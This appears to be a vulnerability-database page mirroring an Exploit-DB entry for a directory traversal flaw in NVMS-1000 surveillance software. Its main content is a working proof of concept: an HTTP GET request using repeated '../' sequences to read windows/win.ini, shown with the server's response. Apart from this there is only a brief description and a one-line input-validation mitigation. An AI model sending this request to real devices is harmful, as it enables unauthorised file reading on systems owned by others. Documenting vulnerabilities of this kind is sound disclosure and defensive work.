header-logo
Suggest Exploit
vendor:
NVMS-1000
by:
Numan Türle
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: NVMS-1000
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows
2019

NVMS-1000 – Directory Traversal

A directory traversal vulnerability exists in NVMS-1000, which allows an attacker to access sensitive files outside of the web root directory. By sending a specially crafted HTTP request, an attacker can traverse the directory structure and access files outside of the web root directory. This can lead to information disclosure, such as the contents of the Windows win.ini file.

Mitigation:

Ensure that user input is validated and filtered to prevent directory traversal attacks.
Source

Exploit-DB raw data:

# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html

POC
---------

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Navigation

Suggest Exploit

Services By CQR